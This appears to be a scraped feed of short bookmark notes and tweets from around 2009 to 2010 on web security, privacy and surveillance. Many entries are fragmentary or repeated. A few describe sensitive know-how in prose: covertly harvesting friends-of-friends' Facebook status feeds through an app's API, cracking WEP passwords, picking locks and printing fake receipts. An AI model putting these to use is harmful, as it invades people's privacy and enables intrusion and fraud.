Reading: Teaching computers to read: Google acquires reCAPTCHA http://bit.ly/141R6p [from http://twitter.com/sandroalberti/statuses/4057584396]

Google acquire reCAPTCHA - teaching computers to read - http://bit.ly/IT1DZ [from http://twitter.com/nick_b/statuses/4050051801]

Google has acquired reCAPTCHA, a company that provides CAPTCHAs to help protect more than 100,000 websites from spam and fraud.

What makes this all rather chilling is that I'm doing all of this via the application API. If your friend has installed an application, then it can access quite a lot of information about you, unless you turn it off. If your friend has granted the application the read_stream privilege, then it can read your status stream. Even if a friend of a friend has done this, and you comment on your friend's status entries, it's possible to infer your existence and retrieve those discussions through dark stalking.

Most recently, I've been able to obtain status feeds, even for users who have very tight privacy settings, although I had to tweak my own application's privileges to do so. I don't know how far into the past these go, but they also come with likes information, and comments. This gives me a wealth of information on the strength and types of relationships people have. A person who comments a lot on another user's posts probably finds that user interesting. If I descended into keyword and text analysis, I may even be able to determine how they find that user interesting.

Programs to pull info out of facebook accounts

the information available to people via facebook is amazing....

Every day more users move their computing lives from the desktop to the cloud and rely on hosted web applications to store and access email, photos, and documents. But this new frontier involves serious risks that aren't obvious to most.

In an era of ubiquitous broadband, smartphones, and users who manage multiple computers and devices, it just makes sense to move your email, photos, documents, calendar, notes, finances, and contacts to awesome web applications like Gmail, Evernote, Flickr, Google Docs, Mint, etc. But transferring your personal data to hosted web applications has its potential pitfalls, risks that get lost in all the hype around cloud-centric new products like Google's new Chrome OS or the iPhone.

ItsHidden.com - A safe, easy, anonymous way to surf the net.

ItsHidden.com is the ultimate FREE surfing privacy service on the Internet with huge capacity and no complicated software to install, you already have everything you need on your computer right now!

Ich finde ja man sollte sich gegen so einen Müll wie länderbezogene Angebote wehren. Sorry, aber das is doch Schwachsinn.

Serious problems like this aren’t supposed to exist nowadays. Every serious or visible exploit is found and fixed quickly. But here we will show you something simple and ordinary yet quite dangerous.

How to Crack a Master Lock - Via: http://www.mark ... - only at incredimazing.com

T. Kendall

插件的漏洞越来越多，如果保证插件是最新版本呢？Mozilla提供了这个工具，目前可以检查15个插件的最新版本。

Check my mozilla firefox plugins to make sure they're up to date.

A comparison of users' expectations of privacy online and the data collection practices of website operators.

Approach: A comparison of users' expectations of privacy online and the data collection practices of website operators. Goal: To identify specific practices that may be harmful or deceptive and attract the attention of government regulators. Result: Recommendations for policymakers to protect consumers and for website operators to avoid stricter regulation.

research site for ghostery

The Current State of Web Privacy, Data Collection, and Information Sharing

evil!

Know Privacy: research by Joshua Gomez, Travis Pinnick, and Ashkan Soltani, UC Berkeley School of Information, class of 2009

Wireless live video camera for security or whatever

Vue is a network of small, battery operated wireless cameras that stream video directly to the internet.

"Tarsnap is an implementation of my idea of a perfect online backup service. After many months in private beta testing, tarsnap is now publicly available for BSD, Linux, and other UNIX-like operating systems."

Tarsnap is an implementation of my idea of a perfect online backup service.

Encrypted snapshotted remote backup. Good to see that competition is thriving in this/these space(s)

Being secure, on the web specially is something we all need. There are thousands of risks roaming and getting evolved in shape of different malwares, viruses,

Being secure, on the web specially is something we all need. There are thousands of risks roaming and getting evolved in shape of different malwares, viruses, file & more. Since these things come via your browser and majority of us use firefox, here are some of the best and useful plugins/add-ons which can help you be safe on the internet. -- http://digg.com/d1waHu

This will come in handy.

Apparently for NOVELTY USE ONLY - you supply info and this site prints an authentic-looking fake receipt on a thermal receipt printer. Mail fraud?

Not quite what I was expecting, but simple enough.

System Administrator Cheat Sheet

America’s spy agencies want to read your blog posts, keep track of your Twitter updates — even check out your book reviews on Amazon

America’s spy agencies want to read your blog posts, keep track of your Twitter updates — even check out your book reviews on Amazon. In-Q-Tel, the investment arm of the CIA and the wider intelligence community, is putting cash into Visible Technologies, a software firm that specializes in monitoring social media. It’s part of a larger movement within the spy services to get better at using ”open source intelligence” — information that’s publicly available, but often hidden in the flood of TV shows, newspaper articles, blog posts, online videos and radio reports generated every day. Visible crawls over half a million web 2.0 sites a day, scraping more than a million posts and conversations taking place on blogs, online forums, Flickr, YouTube, Twitter and Amazon. (It doesn’t touch closed social networks, like Facebook, at the moment.) Customers get customized, real-time feeds of what’s being said on these sites, based on a series of keywords.

9. The universal rule of taxi haggling, for both driver and passenger, is that once both sides agree on a fare before setting off, neither side can reopen negotiations once you’re en route. You should not try to get a better deal nor should you accept any increase in the fare from the driver after the journey has started

give Google Account users the option to sign in to websites with their Google credentials and without having to sign up for a new account at those sites

rd data formats such as Portable Contacts and OpenSocial REST APIs."

Using a password sniffer to get around full disk encryption.

Green Dam

We examined the Green Dam software and found that it contains serious security vulnerabilities due to programming errors. Once Green Dam is installed, any web site the user visits can exploit these problems to take control of the computer. This could allow malicious sites to steal private data, send spam, or enlist the computer in a botnet. In addition, we found vulnerabilities in the way Green Dam processes blacklist updates that could allow the software makers or others to install malicious code during the update process.

Palantir Technologies has designed what many intelligence analysts say is the most effective tool to date to investigate terrorist networks. The software's main advance is a user-friendly search tool that can scan multiple data sources at once, something previous search tools couldn't do.

Palantir Technologies has designed what many intelligence analysts say is the most effective tool to date to investigate terrorist networks.

http://lifehacker.com/5385018/turn-your-pc-into-a-home-surveillance-system

The aim of this project is to create an ideal administration tool which can prevent running any application in Windows. The development process is divided into a series of stages, each of them being indicated in the roadmap section. The project is targeted at the corporate audience and, among other things, sets a goal to develop powerful features for remote administration of all domain computers at once. The project started on October 20, 2008.

I Will Teach You How To Be Rich

Protecting the web for your security, privacy and anonymity! Get behind the VPN ! Get help from our Stuff! Free VPN by WSC * Access blocked websites from within a corporate environmement * Watch Hulu.com, Pandora.com, ABC.com, BBC.co.uk Abroad * Use VoIP software like Skype if it's blocked * Protect yourself from snoopers at Wi-Fi hotspots, hotels, airports, corporate offices and ISP hubs. * Hide your IP address for your privacy online 100% Security Through a VPN Free VPN by WSC Free VPN by WSC So go ahead - Get behind the Shield - Try Free VPN today! Free VPN runs on 32 bit and 64 bit Windows OS: * Windows 7 * Windows Vista * Windows XP * Windows 2008 * Windows 2003 By clicking on the download button, you are agreeing to the Free VPN terms of use. If you decide to uninstall Free VPN at any

How to access geographically targeted services.

hide your IP address - free tools are plenty available

using proxies to bypass geospecific IP restrictions

Great, Simple, and Useful - Password Strength Checker Tutorial

Segurança em senhas

use ldd to hack system

A very smart visualization of passwords and its effect on usability

Yesterday, I posted Chroma-Hash, an experiment in how to visualize the live-input of secure fields, such as a password on a login screen. So far, I’ve received a lot of great feedback, as well as a number of questions that I thought deserved a proper response. Before I go into any details, I invite you to check out the live demo, (if you haven’t seen it already), so you can get a clear idea of what Chroma-Hash does.

Article on how to solve the masked password issues. Solution doesn't work, but it's a start.

Elegant UI gives user visual feedback on correctness of "hidden" passwords

visualize the live-input of secure fields, such as a password on a login screen

A: Almost everything you've put on there.

個人情報なので出せない、という人に対しては、「プロバイダ責任制限法案があるので、明確な理由がある限り、開示者の責任は問われない」ということをしっかりと教えてあげましょう

Microsoft Security Essentials

Notes on methods to eliminate corruption in a system by making honesty the most advantageous course of action

"Here’s a self-enforcing protocol for determining property tax: the homeowner decides the value of the property and calculates the resultant tax, and the government can either accept the tax or buy the home for that price. Sounds unrealistic, but the Greek government implemented exactly that system for the taxation of antiquities. It was the easiest way to motivate people to accurately report the value of antiquities."

Computer viruses are increasingly sophisticated and pervasive. If you can't afford to run your computer without some sort of antivirus software installed, check out these five popular options to protect your PC.

One of the best ways to ensure strong security for your WordPress-powered site is to secure its foundations during the installation process. Of course these techniques can be implemented at any point during the life of your site, but stetting them before the game starts prevents headaches and saves time. We’ll start with the WordPress database.

One of the best ways to ensure strong security for your WordPress-powered site is to secure its foundations during the installation process. Of course these techniques can be implemented at any point during the life of your site, but stetting them before the game starts prevents headaches and saves time. We’ll start with the WordPress database

ne of the best ways to ensure strong security for your WordPress-powered site is to secure its foundations during the installation process. Of course these techniques can be implemented at any point during the life of your site, but stetting them before the game starts prevents headaches and saves time. We’ll start with the WordPress database..

seguridad para wordpress

Comodo EasyVPN allows businesses and home users to quickly group multiple computers into a secure, peer to peer, network over the Internet.

Windows only: Free application Creates a virtual private network between your computers for a hassle-free, secure private network. Simple to set up. Just install the application, register for an account, and then log in. Once you've got the app running on a couple of computers, you can easily (and securely) access one computer from the other as though you're on the same local network. As we mentioned in our guide to Hamachi, a VPN comes in handy when: * You're on the road with your laptop and want secure access to your PC's files. * Your office or dorm room computer is behind a restrictive firewall that doesn't let you reach it from the internet. * You want to add encryption to insecure network protocols like VNC. * You want to set up a shared folder of files for friends and family to access. Apart from the basics, EasyVPN also comes with a built-in, secure chat tool.

e most irritating feature introduced in Windows Vista was those annoying UAC prompts, asking you for permission to do nearly anything on your computer—and the fact is, even if it makes you feel more secure, it's a false sense of security. Malware researchers at SophosLabs found that 8 of 10 malware samples can actually bypass UAC on a system with the defa

Panda Cloud, the constantly updated, cloud-run antivirus app that promises almost real-time protection from burgeoning web threats, is out of beta and available for a free download

http://lifehacker.com/5401263/panda-cloud-antivirus-available-for-download

Simple video monitoring software brings enterprise-grade functionality to anyone with a webcam or network camera.

Introducing Vitamin D Video. Our simple video monitoring software brings enterprise-grade functionality to anyone with a webcam or network camera.

How Twitter was hacked.

USB flash drives are our personal data carriers, but the way we use it to exchange files also makes them open to viruses. The Achilles heel which viruses

Data validation is an integral part of working with forms. Not only can invalid submitted data lead to security problems, but it can also break your webpage. Today, we'll take a look at how to remove illegal characters and validate data by using the "filter_var" function.

Data validation is an integral part of working with forms. Not only can invalid submitted data lead to security problems, but it can also break your webpage.

using filter_var to santise and validate input

As an ex-Brit, I’m well aware of the authorities’ love of surveillance and snooping, but even I, a pessimistic cynic, am amazed by the governments latest plan: to install Orwell’s telescreens in 20,000 homes.

£400 million ($668 million) will be spend on installing and monitoring CCTV cameras in the homes of private citizens.

net stop

From 3AM on Wednesday November 25, 2009, until 3AM the following day (US east coast time), WikiLeaks is releasing over half a million US national text pager intercepts. The intercepts cover a 24 hour period surrounding the September 11, 2001 attacks in New York and Washington.

"WikiLeaks is releasing over half a million US national text pager intercepts. The intercepts cover a 24 hour period surrounding the September 11, 2001 attacks in New York and Washington. [...] Text pagers are usualy carried by persons operating in an official capacity. Messages in the archive range from Pentagon, FBI, FEMA and New York Police Department exchanges, to computers reporting faults at investment banks inside the World Trade Center"

In the past year, researchers have developed technology that makes it possible to use thoughts to operate a computer, maneuver a wheelchair or even use Twitter — all without lifting a finger. But as neural devices become more complicated — and go wireless — some scientists say the risks of “brain hacking” should be taken seriously.

scientists say the risks of “brain hacking” should be taken seriously.

you know...we really should call it 'Ghost-hacking'...

RT @wiredscience: The next target for hackers could be your brain. http://is.gd/1svMA [from http://twitter.com/reinikainen/statuses/2557678128]

Computer security for prosthetics http://www.wired.com/wiredscience/2009/07/neurosecurity/ [from http://twitter.com/JacksonATL/statuses/2621731930]

This is the way the web should work. Facebook - pleas join this!

Google, Yahoo! and MySpace support for OpenID

Computer Search Engine

SHODAN lets you find servers/ routers/ etc. The data in the index covers web servers, FTP, Telnet and SSH services.

SHODAN lets you find servers/ routers/ etc. by using the simple search bar up above. Most of the data in the index covers web servers at the moment, but there is some data on FTP, Telnet and SSH services as well. Let me know which services interest you the most and I'll prioritize them in my scanning.

Data validation

FILTER_FLAG_ENCODE_LOW - Encode characters with ASCII value below 32

Windows only: Free application Comodo EasyVPN creates a virtual private network between your computers for a hassle-free, secure private network. That means you can access, for example, anything on your home computer from work as though you're on the same local network.

"Once you've got the app running on a couple of computers, you can easily (and securely) access one computer from the other as though you're on the same local network."

OpenDPI - The Open Source Deep Packet Inspection Engine

OpenDPI is a software library designed to classify Internet traffic according to network protocols. For this purpose mainly deep packet inspection (DPI) is used. OpenDPI is derived from PACE, the traffic classification engine of ipoque, a provider of carrier!grade DPI and bandwidth management solutions. In contrast to ipoque's PACE engine, OpenDPI does not support the detection of encrypted protocols and it does not use any heuristic and behavioral analysis for classification.

OpenDPI is a software component for traffic classification based on deep packet inspection.

Use this site to remove passwords and restrictions (such as printing, copying text, etc.) from PDFs. Note: This only works for PDFs that you can open and read without any 3rd party plugins. PDFs that require a password to be viewed cannot be unlocked by this service.

"a free, global Domain Name System (DNS) resolution service"

via http://blogs.microsoft.co.il/blogs/sasha/archive/2009/09/06/exploitable-crash-analyzer.aspx

a simple best practices article on handling passwords and authentication. There’s nothing particularly new here, but it’s always worthwhile revisiting the basics.

Panda Cloud Antivirus is a really light, install-and-forget antivirus client that protects faster against the latest viruses. Download free antivirus and anti-spyware protection.

Wie Sie sich vor Google verstecken

Interessanter Artikel bei SpOnline

publicly available information"

In conclusion, we at EFF are worried that today's changes will lead to Facebook users publishing to the world much more information about themselves than they ever intended.

The new changes are intended to simplify Facebook's notoriously complex privacy settings and, in the words of today's privacy announcement to all Facebook users, "give you more control of your information." But do all of the changes really give Facebook users more control over their information? EFF took a close look at the changes to figure out which ones are for the better — and which ones are for the worse.

App that locks your Mac when your iPhone goes out of range

security osx iPhone sysadmin

Lock your computer when you (actually, your iPhone) are out of range.

This is the loss of freedom we face when our privacy is taken from us. This is life in former East Germany, or life in Saddam Hussein's Iraq. And it's our future as we allow an ever-intrusive eye into our personal, private lives. Too many wrongly characterize the debate as "security versus privacy." The real choice is liberty versus control. Tyranny, whether it arises under threat of foreign physical attack or under constant domestic authoritative scrutiny, is still tyranny. Liberty requires security without intrusion, security plus privacy. Widespread police surveillance is the very definition of a police state. And that's why we should champion privacy even when we have nothing to hide.

Privacy protects us from abuses by those in power, even if we're doing nothing wrong at the time of surveillance. We do nothing wrong when we make love or go to the bathroom. We are not deliberately hiding anything when we seek out private places for reflection or conversation. We keep private journals, sing in the privacy of the shower, and write letters to secret lovers and then burn them. Privacy is a basic human need. For if we are observed in all matters, we are constantly under threat of correction, judgment, criticism, even plagiarism of our own uniqueness. We become children, fettered under watchful eyes, constantly fearful that -- either now or in the uncertain future -- patterns we leave behind will be brought back to implicate us, by whatever authority has now become focused upon our once-private and innocent acts. We lose our individuality, because everything we do is observable and recordable.

Bruce Schneier once again gets good mileage out of his earlier essay on the value of privacy. This time quoting portions in response to a remark made by Eric Schmidt with the typical "If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place" argument.

Too many wrongly characterize the debate as "security versus privacy." The real choice is liberty versus control. Tyranny, whether it arises under threat of foreign physical attack or under constant domestic authoritative scrutiny, is still tyranny. Liberty requires security without intrusion, security plus privacy. Widespread police surveillance is the very definition of a police state. And that's why we should champion privacy even when we have nothing to hide.

I’ve moved to Chrome and Safari as my primary browsers, but nothing compares to Firefox when it comes to functionality and plugin support. Shown below are the information security related plugins I recommend any infosec professional (or enthusiast) install upon spinning up a new Firefox instance.

Auto-fills the megaupload captcha and auto-starts download

Last week Facebook rolled out a new version of their privacy settings to all users. Privacy settings are something that many Facebook users are regularly confused about. That’s why we published our original Facebook privacy guide back in February. After millions of people visited our privacy guide, we realized how important privacy is to Facebook users. With the new settings rolled out, we thought that now would be a great time to update the guide with the latest changes. In this guide we present a thorough overview of the most important privacy settings which includes previous settings that are still relevant as well as new privacy settings that have been added by Facebook. The majority of the old privacy settings are still relevant, however there’s a chance that you may now be sharing much more information with the whole world. Make it through our new Facebook privacy guide and you’re guaranteed to be safe.

As noted in the instructions, Process Blocker runs as a system service, watching for certain processes and killing them off if it finds them running. The app won't provide you a list of background services or apps for selection, though—this is a text affair. If you look in your Task Manager (Control-Shift-Escape), or your super-charged Process Explorer

Encrypt data sentback to a server - quickly

We offer a fast, small symmetric encryption library written in Javascript. Though several such libraries exist, jsCrypto offers several advantages.

recuperação gmail

t of all your Gmail / Google Accounts and initiate the password recovery process

なるほど。メールアカウント乗っ取りからすべて始まったのか。

クラウドサービスのセキュリティ、秘密の質問、他のサービスのIDにリセットされたパスワードを送る、IDでIDの正当性を証明、ユーザが持つ複数のIDのうち１個のパスワードを破ればよい、蟻の一穴、ウィルス対策と同じ

攻撃手口

Militants in Iraq have used $26 off-the-shelf software to intercept live video feeds from U.S. Predator drones, potentially providing them with information they need to evade or monitor U.S. military operations. Senior defense and intelligence officials said Iranian-backed insurgents intercepted the video feeds by taking advantage of an unprotected communications link in some of the remotely flown planes' systems. Shiite fighters in Iraq used software programs such as SkyGrabber -- available for as little as $25.95 on the Internet -- to regularly capture drone video feeds, according to a person familiar with reports on the matter. some officials to conclude that militant groups trained and funded by Iran were regularly intercepting feeds. A Reaper costs between $10 million and $12 million each and is faster and better armed than the Predator

Shiite fighters in Iraq used software programs such as SkyGrabber -- available for as little as $25.95 on the Internet -- to regularly capture drone video feeds, according to a person familiar with reports on the matter.

Militants in Iraq have used inexpensive, off-the-shelf software to intercept video feeds from Predator drones.

US Aircrafts hacked by Insurgents from Iraq

We have identified a vulnerability in the Internet Public Key Infrastructure (PKI) used to issue digital certificates for secure websites. As a proof of concept we executed a practical attack scenario and successfully created a rogue Certification Authority (CA) certificate trusted by all common web browsers. This certificate allows us to impersonate any website on the Internet, including banking and e-commerce sites secured using the HTTPS protocol.

FireFound is an add-on for Firefox and Fennec (mobile Firefox) that helps your find your computer (or mobile phone, in the case of Fennec) if it is lost or stolen. Every time your computer's location changes, FireFound sends a secure message to a central server with its current location. You can then log into the server and see your computer's current location. All of the location data is encrypted, so no one can find out where your computer is without your password. If you lose your computer, you can tell FireFound to clear your personal data (saved passwords, browsing history, etc.) if anyone starts your browser before you can retrieve it.

FireFound is an add-on for Firefox and Fennec (mobile Firefox) that helps your find your computer (or mobile phone, in the case of Fennec) if it is lost or stolen

The tool to trace your laptop through ff's geolocation feature and nuke the computer remotely if needed. Firefox addon.

Firefox add-on that helps you find your computer

Panda Cloud Antivirus is a free download for 32-bit Windows only

Panda Cloud Antivirus uses the power of cloud computing to scan and eliminate viruses from your PC that can identify new malware in almost real time. A free download for 32-bit Windows only, and according to CNET will stay free for personal use even after it is released from beta. Read comments for details.

Given these numbers, the authors estimate that even a moderate-sized botnet of 10,000 machines could successfully obtain identity verifications for younger residents of West Virginia at a rate of 47 a minute.

Two researchers have found that a pair of antifraud methods intended to increase the chances of detecting bogus social security numbers has actually allowed the statistical reconstruction of the number using information that many people place on social networking sites.

How to install a "garage door open" indicator Ever left your garage door open overnight? In addition to being a terrible energy waster, all the tools, bikes, and other stuff are available to thieves - who might even enter your home via the door from your garage to your living quarters. Install a simple indicator which will alert you if you've left the garage door open. Total cost is less than $30-$40, and you can determine exactly where the indicator will be located.

And that's how a decentralized community solved a security threat in an open identity spec, quickly. One company (Twitter) took a risk at implementing a new technology advocated by an employee of another company (Yahoo's Hammer-Lahav), then an engineer at yet another company found the beginning of the security hole, then news of the whole problem was sent out to contacts on a Wiki, an email list was formed, companies donated their employees' valuable time to aid in the effort, everyone more or less kept their mouths shut (including the unfairly criticized Twitter) and then everyone worked together to find a solution just in time. I think that's a pretty cool story.

RT @jayrosen_nyu: I understood about 40% of this, but wow, what a story. How OAuth Security Battle Was Won, Open Web Style http://tr.im/jICt [from http://twitter.com/CircleReader/statuses/1617435709]

At some point in conversation Hammer-Lahav realized that the problem went far beyond the Twitter implementation. The OAuth protocol had an inherent vulnerability; big companies like Google, Netflix and Yahoo had implemented OAuth and scores of tiny startups had too... OAuth has support, but it doesn't have a centralized authority ready to deal with problems like this. Over the next week a story unfolded as the community moved to deal with the security issue. It's a dramatic story.

Dear US government and TSA. This is reality, not TV. Please act accordingly not stupidly.

A terrorist attack cannot possibly destroy a country's way of life; it's only our reaction to that attack that can do that kind of damage. The more we undermine our own laws, the more we convert our buildings into fortresses, the more we reduce the freedoms and liberties at the foundation of our societies, the more we're doing the terrorists' job for them.

“By not overreacting, by not responding to movie-plot threats, and by not becoming defensive, we demonstrate the resilience of our society, in our laws, our culture, our freedoms. There is a difference between indomitability and arrogant "bring 'em on" rhetoric. There's a difference between accepting the inherent risk that comes with a free and open society, and hyping the threats.”

Professor Schneier does it again. He puts into words what I've been thinking, much better than I could have done so.

Last week's attempted terror attack on an airplane heading from Amsterdam to Detroit has given rise to a bunch of familiar questions. How did the explosives get past security screening? What steps could be taken to avert similar attacks? Why wasn't there an air marshal on the flight? And, predictably, government officials have rushed to institute new safety measures to close holes in the system exposed by the incident. Reviewing what happened is important, but a lot of the discussion is off-base, a reflection of the fundamentally wrong conception most people have of terrorism and how to combat it.

SecureFiles, protect your documents easily.

SecureFiles is a simple app which allows you to create encrypted Disk Images to store your sensitive documents.

10個しかないんかな

Bluetooth Proximity Detection

It locks your computer when you go away from it. How is it done. It locks on one of your Bluetooth devices which are paired to the the machine. When you walk away from the computer the device is disconnected and the computer is locked after timeout.

It locks on one of your Bluetooth devices which are paired to the the machine. When you walk away from the computer the device is disconnected and the computer is locked after timeout.

Amazon.com: Emergency: This Book Will Save Your Life: Neil Strauss: Books

500 Internal Server Error

Windows Exploit Programming Primer Tutorial

check on this around October 09 to see if any progress has been made

Your laptop is missing. You're completely out of luck, right? Not if your laptop can phone home. Prey is a cross-platform security application that sends home pictures and location data when your laptop goes missing. When your laptop goes missing Prey scans for open WiFi connections. When it can connect, either via WiFi or a hard line it will send you a report including the status of the computer, which programs are running, the active connections, a run down of the network location, a screenshot of the desktop, and if your laptop has an integrated webcam you'll even get a picture of the

The Truth Behind Real CSI Evidence - Popular Mechanics

As DNA testing has made it possible to re-examine biological evidence from past trials, more than 200 people have had their convictions overturned. In approximately 50 percent of those cases, bad forensic analysis contributed to their imprisonment.

Forensic science was not developed by scientists. It was mostly created by cops, who were guided by little more than common sense. And as hundreds of criminal cases begin to unravel, many established forensic practices are coming under fire. PM takes an in-depth look at the shaky science that has put innocent people behind bars.

RT @tweetlicius: Flush.app - #Flash #Cookie Removal Tool For #OSX | #Mac Hacks.TV - http://bit.ly/5z5q0N

UPDATE: 7TH SEP 2009: FLUSH 0.3.1 released Flush has been updated. Hopefully all of the issues raised up till now will be addressed. Flush 0.3.1 is now

Being part of a botnet is no fun. Your computer becomes your worst enemy, watching everything you do, collecting all of your secrets, and then delivering all that data to the bot-herder; the person who originated the network. But what does it really mean to be part of a botnet, and is there anything that can you do about it?

good information about determining if your pc is infected with malware

If you allow applications to save your passwords, anyone with physical access to your PC can decode them unless you're properly encrypting them—and chances are pretty good you're not. Let's walk through the right and wrong ways to store your passwords.

If you allow applications to save your passwords, anyone with physical access to your PC can decode them unless you&#039;re properly encrypting them&mdash;and chances are pretty good you&#039;re not. Let&#039;s walk through the right and wrong ways to store your passwords.

Hochinteressante Einblicke in Facebook.

Interview, mostly about privacy, with an anonymous Facebook employee: http://bit.ly/6Zrsq1 Worth reading. (via @johnbattelle on FB) – Tim O'Reilly (timoreilly) http://twitter.com/timoreilly/status/7673198122

Cyfweliad dienw gyda boi yn gweithio i Facebook. Son am HyperPHP

It appears China can't play nice with the other kids.

Very big news you should read this!

wow, good

Congrats to Google for raging against censorship, but WTF? A blog post accusing a foreign government of attacking them? Maybe they're getting a little too big? Ya think?

Whoa. China attacks Google (to steal business information and human rights activist email). Google withdraws from China.

ink is really cool, though, is that the photo also shows the agent’s worksheet:

German

Website security is an interesting topic and should be high on the radar of anyone who has a Web presence under their control. Ineffective Web security leads to all

The Adobe Flash Player maintains proprietary cookies called Local Shared Objects or LSO’s. LSO’s are capable of storing 100 kb’s of information for an indefinite amount of time by default. When you clear your browser history in Internet Explorer, Firefox or Opera on Windows, Linux, or OS X LSO’s are not cleared from Adobe’s local repository.

Os X

There are hundreds of applications out there from spyware cleaners to built-in browser features that eliminate cookies on the spot, and even let you set cookie policies on your computer regarding what can be stored in your machine, and for how long. I’m assuming that if you’re here reading this post, you already know all of the dangers of cookies on your computer. In all honesty, I don’t seriously believe that they’re the most dangerous form of movement or web tracking, but they can definitely be used to monitor more movements than a person should feel comfortable with.

Explains how to adjust your Flash player settings

Shame on you, Adobe!

Never new this! Amazing amount of stuff stored on your computer using flash 'cookies' which never gets cleaned from the browser.

great security tips for travlers

Ed. note: On Tuesday, Google responded to cyber attacks aimed at Chinese human-rights activists by ending search-result censorship in China. An anonymous reader with experience living where privacy isn't respected writes in with tips for keeping your data safe in these situations.

Image forensics

a small tool used for photo forensics like in this article: http://www.hackerfactor.com/blog/index.php?/archives/322-Body-By-Victoria.html

A smart method to prevent spam in form submissions without using a CAPTCHA

GoogleSharing is a special kind of anonymizing proxy service, designed for a very specific threat.

"GoogleSharing is a special kind of anonymizing proxy service, designed for a very specific threat. It ultimately aims to provide a level of anonymity that will prevent google from tracking your searches, movements, and what websites you visit. GoogleSharing is not a full proxy service designed to anonymize all your traffic, but rather something designed exclusively for your communication with Google. Our system is totally transparent, with no special "alternative" websites to visit. Your normal work flow should be exactly the same." http://www.thoughtcrime.org/ & http://www.disruptivestudies.org/

GoogleSharing is a system that mixes the requests of many different users together, such that Google is not capable of telling what is coming from whom.

Apache's .htaccess(hypertext access) configuration file can be a very powerful tool in a web developer's toolkit if used properly. It can be found in the

Apache's .htaccess(hypertext access) configuration file can be a very powerful tool in a web developer's toolkit if used properly. It can be found in the webroot of your server and can be easily edited using any text editor. In this article I'm going to show you 20 .htaccess hacks and how to use them.

"Follow the instructions below to download the SUPERAntiSpyware Portable Scanner. The scanner features our complete scanning and removal engine and will detect AND remove over 1,000,000 spyware/malware infections. The scanner does NOT install anything on your Start Menu or Program Files and does NOT need to be uninstalled."

In December, Facebook made a series of bold and controversial changes regarding the nature of its users' privacy on the social networking site. The company once known for protecting privacy to the point of exclusivity (it began its days as a network for college kids only - no one else even had access), now seemingly wants to compete with more open social networks like the microblogging media darling Twitter.

Have you ever had the need to send completely anonymous emails to someone? Perhaps you were trying to prank one of your friends, or wanted to shyly declare your

Penetration Testing and Vulnerability Analysis

Innovative course at NYU-Poly that discusses Penetration Testing and Vulnerability Analysis . The course is split into six 2 week modules where an industry expert comes in and teachers a portion of the course. The website has all the course materials and even some of the lectures in video format.

With this guide, we will show you the essential initial tweaks everyone should make to “awesomize” their browser. Whether it’s accelerating browser page-load performance, boosting security, or just improving the look of the interface, we teach you the tweaks that we think should be implemented the first time you start up a browser after installation.

Well, it could come in handy for *something*, right?

how to pick a lock!

Nobody likes having to think up new passwords, which often leads to people using the same ones over and over.  Even if you do come up with some good passwords,

I know very little about cryptography, but I do find it fascinating. This article seems to have solid, real-world advice, yet it is written in a way that even I can understand it. People who can write like this impress me.

why hash is not security

"Panopticlick tests your browser to see how unique it is based on the information it will share with sites it visits."

is it possible to uniquely identify your browser w/o any cookies involved? apparently, that's quite feasible.

Hahaha, "Why did you choose a liberal-arts degree when your entire family urged you to go into finance?"

- - - - What is your mother's maiden name? What is your older sister's favorite Monopoly game piece? Who did your paternal grandfather vote for in the 1956 presidential election? Why did you choose a liberal-arts degree when your entire family urged you to go into finance? In what year did you begin working on your novel? How many weeks away was graduation when you dropped out of college? What was your score on the civil-service employment exam? Where were you sitting when your girlfriend told you she was pregnant? Where did you never end up going for your honeymoon? In what year did you begin working for the post office? What is the name of the hedge-fund manager your ex-wife married? How many hours did it take you to drink that bottle of Jack Daniel's yesterday? What time was it when, in a drunken rage, you threw your novel into the fire? If you could do it all over again, what would you do differently?

I think some of these might actually be in use!

Some Answers: Front Door, 4, 1999, Rome, 2014, 8:22

"Why did you choose a liberal-arts degree when your entire family urged you to go into finance?"

ha

A PHP function to protect the E-mail address you publish on your website against bots or spiders

permite ocultar las direcciones de correo en un página, util para evitar el spam

A PHP function to protect the E-mail address you publish on your website against bots or spiders that index or harvest E-mail addresses for sending you spam. It uses a substitution cipher with a different key for every page load. Look at the generated XHTML in the example while pressing the browsers "reload" button to see this in effect.

Crack a Wi-Fi Network's WEP Password with BackTrack, the Fancy Video Version - Security - Lifehacker

Last summer we detailed how to crack a Wi-Fi network's WEP password using BackTrack. Now video blog Tinkernut revisits the subject with a great video step-by-step of the process.

bcrypt

2010-01-31, by Coda Hale, "Use bcrypt. Use bcrypt. Use bcrypt. Use bcrypt. Use bcrypt. Use bcrypt. Use bcrypt. Use bcrypt. Use bcrypt."

Information on how to delete your account from all of the major social networking, blogging, shopping, etc. sites and services across the web.

如何删除各种服务？一站式！

PortableTor is a thumb drive friendly version of the popular anonymous browsing software, Tor.

Official misuses are bad enough, but it's the unofficial uses that worry me more. Any surveillance and control system must itself be secured. An infrastructure conducive to surveillance and control invites surveillance and control, both by the people you expect and by the people you don't. The problem is that such control makes us all less safe. Whether the eavesdroppers are the good guys or the bad guys, these systems put us all at greater risk. Communications systems that have no inherent eavesdropping capabilities are more secure than systems with those capabilities built in. And it's bad civic hygiene to build technologies that could someday be used to facilitate a police state.

Bajo el título amarillista "USA habilita hackeo de China a Google" hay un buen artículo, lleno de info importante. http://bit.ly/64uzts [from http://twitter.com/dariuus/statuses/8156429222]

"In order to comply with government search warrants on user data, Google created a backdoor access system into Gmail accounts. This feature is what the Chinese hackers exploited to gain access. Google's system isn't unique. Democratic governments around the world -- in Sweden, Canada and the UK, for example -- are rushing to pass laws giving their police new powers of Internet surveillance, in many cases requiring communications system providers to redesign products and services they sell."

Schneier on how the mandated backdoor access system allowed for the China incident

articulo de Bruce Scheneier sobre el ataque de china a google. video hillary clinton sobre la libertad de internet

RT @dangoldin: RT @mikkohypponen: Bruce Schneier writes to CNN on Google & China http://bit.ly/6uMYkx [from http://twitter.com/davidajudd/statuses/8152550494]

In order to comply with government search warrants on user data, Google created a backdoor access system into Gmail accounts. This feature is what the Chinese hackers exploited to gain access.

Great comment on using XFS and snapshots to reduce downtime.

